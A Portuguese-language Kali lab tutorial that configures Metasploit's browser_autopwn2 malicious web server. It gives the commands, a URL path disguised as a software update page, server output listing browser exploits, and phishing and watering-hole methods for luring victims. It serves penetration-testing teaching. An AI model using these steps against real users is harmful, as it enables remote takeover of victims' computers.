Configurar um Ataque de Browser Autopwn no Metasploit

Kali LinuxBeginner
Pratique Agora

Introdução

Neste laboratório, você explorará um dos recursos poderosos do Metasploit Framework: o ataque browser autopwn. Este tipo de ataque envolve a configuração de um servidor web malicioso que, ao ser visitado por um alvo, detecta automaticamente o tipo e a versão do navegador da vítima e, em seguida, serve um exploit adaptado a quaisquer vulnerabilidades descobertas.

Usaremos o módulo auxiliary/server/browser_autopwn2, uma versão atualizada e mais confiável do browser autopwn original. Este laboratório irá guiá-lo através do processo de seleção do módulo, configuração das opções necessárias e lançamento do servidor.

Aviso Legal: Este laboratório é apenas para fins educacionais. As técnicas descritas só devem ser realizadas em sistemas que você possui ou para os quais tem permissão explícita para testar.

Selecionar o módulo auxiliary/server/browser_autopwn2

Nesta etapa, você iniciará o console do Metasploit Framework e selecionará o módulo browser_autopwn2, que será o núcleo da configuração do nosso ataque.

Primeiro, abra um terminal e inicie o console do Metasploit. Usaremos a flag -q para uma inicialização "silenciosa" (quiet), que suprime o banner para uma interface mais limpa.

msfconsole -q

Assim que o console for carregado, você verá o prompt do Metasploit, que se parece com msf6 >. O Metasploit organiza suas ferramentas em módulos. Para configurar nosso ataque, precisamos usar o módulo auxiliar browser_autopwn2. Use o comando use para selecioná-lo.

use auxiliary/server/browser_autopwn2

Após executar o comando, seu prompt mudará para indicar que você está agora no contexto deste módulo específico.

msf6 > use auxiliary/server/browser_autopwn2
msf6 auxiliary(server/browser_autopwn2) >

Você está agora pronto para configurar as opções do módulo.

Definir a opção LHOST para o seu IP do Kali

Nesta etapa, você configurará a opção LHOST. LHOST significa "Local Host" (Host Local) e deve ser definido para o endereço IP da sua máquina atacante (a VM LabEx). Quando um exploit for bem-sucedido, a máquina da vítima se conectará de volta a este endereço IP, dando-lhe o controle.

Primeiro, você precisa encontrar o endereço IP da sua VM LabEx. Você pode abrir uma nova aba de terminal clicando no ícone + na janela do terminal. No novo terminal, execute o seguinte comando para exibir seu endereço IP:

ip addr show eth0 | grep "inet " | awk '{print $2}' | cut -d/ -f1

Você verá uma saída semelhante a esta. Certifique-se de copiar o seu endereço IP específico.

10.0.2.15

Agora, volte ao seu terminal original onde o msfconsole está em execução. Para ver todas as opções configuráveis para o módulo browser_autopwn2, use o comando show options.

show options

Você verá uma lista de opções. Observe que LHOST é obrigatório, mas ainda não está definido. Use o comando set para configurar LHOST com o endereço IP que você acabou de copiar. Substitua YOUR_IP_ADDRESS pelo seu IP real.

set LHOST YOUR_IP_ADDRESS

Por exemplo, se o seu IP fosse 10.0.2.15, o comando seria:

set LHOST 10.0.2.15

O Metasploit confirmará a alteração.

LHOST => 10.0.2.15

O LHOST está agora corretamente configurado.

Definir o URIPATH para o servidor malicioso

Nesta etapa, você definirá o URIPATH. Esta opção define o caminho específico no seu servidor web que a vítima deve visitar para acionar o ataque. Usar um caminho discreto e não padrão pode tornar o ataque menos óbvio.

Assim como na etapa anterior, você pode usar show options para revisar as configurações atuais. Você verá que URIPATH tem um valor padrão, mas o alteraremos para algo personalizado.

Vamos definir o caminho para /updates. Isso pode enganar um usuário a pensar que está visitando uma página de atualização de software. Use o comando set para alterar o URIPATH.

set URIPATH /updates

O console confirmará que o URIPATH foi atualizado.

URIPATH => /updates

Agora, o URL malicioso que uma vítima precisaria visitar será http://<YOUR_IP_ADDRESS>:8080/updates.

Executar o módulo para iniciar o servidor web

Nesta etapa, com todas as opções necessárias configuradas, você iniciará o módulo auxiliar. Isso iniciará um servidor web na sua máquina que escuta por conexões de entrada de potenciais vítimas.

Para iniciar o módulo, basta digitar run no prompt do msfconsole e pressionar Enter.

run

O Metasploit agora iniciará o servidor e carregará todos os exploits de navegador relevantes. Você verá muita saída enquanto o servidor é inicializado. A informação chave a procurar é a confirmação de que o servidor foi iniciado e a URL que ele está usando.

A saída será algo como isto (alguns detalhes podem variar):

[*] Auxiliary module running as a background job 0.
[*] Using URL: http://10.0.2.15:8080/updates
[*] Server started.
[*] Starting the payload handler...
[*] Analyzing browser info and matching exploits...
[*] Added exploit/windows/browser/adobe_flash_avm2...
[*] Added exploit/windows/browser/adobe_flash_copy_pixels...
... (muitos outros exploits serão listados) ...

Seu servidor malicioso está agora em execução e aguardando ativamente que um navegador web se conecte a http://10.0.2.15:8080/updates (com seu IP real). Quando um navegador se conectar, o servidor o analisará e tentará lançar um exploit adequado.

Discutir como atrair um alvo para o URL malicioso

Nesta etapa final, discutiremos a parte mais crítica deste ataque: fazer com que um alvo visite o URL malicioso. O servidor está em execução, mas é passivo; ele não pode fazer nada até que uma vítima navegue até o link. Esta fase depende fortemente de engenharia social.

Como este ambiente de laboratório não inclui uma "máquina de vítima" separada, esta etapa é puramente conceitual. Não há comandos para executar.

Aqui estão alguns métodos comuns usados para entregar o link malicioso (http://YOUR_IP_ADDRESS:8080/updates) a um alvo:

  • E-mails de Phishing: Enviar um e-mail enganoso que incentiva o usuário a clicar no link. Por exemplo, o e-mail pode fingir ser um alerta de segurança, uma oferta especial ou uma notificação de redefinição de senha.
  • Mensagens Instantâneas: Enviar o link diretamente a um alvo através de um aplicativo de chat, muitas vezes com uma mensagem como "Ei, confira este site legal!"
  • Mídias Sociais: Postar o link em uma plataforma de mídia social, seja publicamente ou em uma mensagem direta, para incentivar cliques.
  • Ataque de "Watering Hole": Uma técnica mais avançada onde um atacante compromete um site legítimo que o alvo é conhecido por frequentar. O atacante então incorpora o link malicioso ou um redirecionamento nesse site.

Se um alvo com um navegador vulnerável visitar seu URL, o browser_autopwn2 servirá automaticamente o exploit apropriado. Se o exploit for bem-sucedido, uma "sessão" será aberta no seu console Metasploit, dando-lhe acesso remoto à máquina da vítima. Você verá uma mensagem como [*] Session 1 opened... no seu terminal.

Resumo

Parabéns por completar este laboratório! Você aprendeu com sucesso os passos fundamentais para configurar um ataque de browser autopwn usando o Metasploit Framework.

Neste laboratório, você:

  • Iniciou o console Metasploit.
  • Selecionou o módulo auxiliary/server/browser_autopwn2.
  • Configurou as opções essenciais LHOST e URIPATH.
  • Iniciou o servidor web malicioso e compreendeu sua função.
  • Discutiu as técnicas de engenharia social necessárias para atrair um alvo para o URL malicioso.

Este exercício demonstra o quão poderosas e automatizadas podem ser as ferramentas de teste de penetração. Ele também destaca a importância crítica de manter navegadores web e seus plugins atualizados para se defender contra tais ataques. Lembre-se sempre de usar este conhecimento de forma responsável e ética.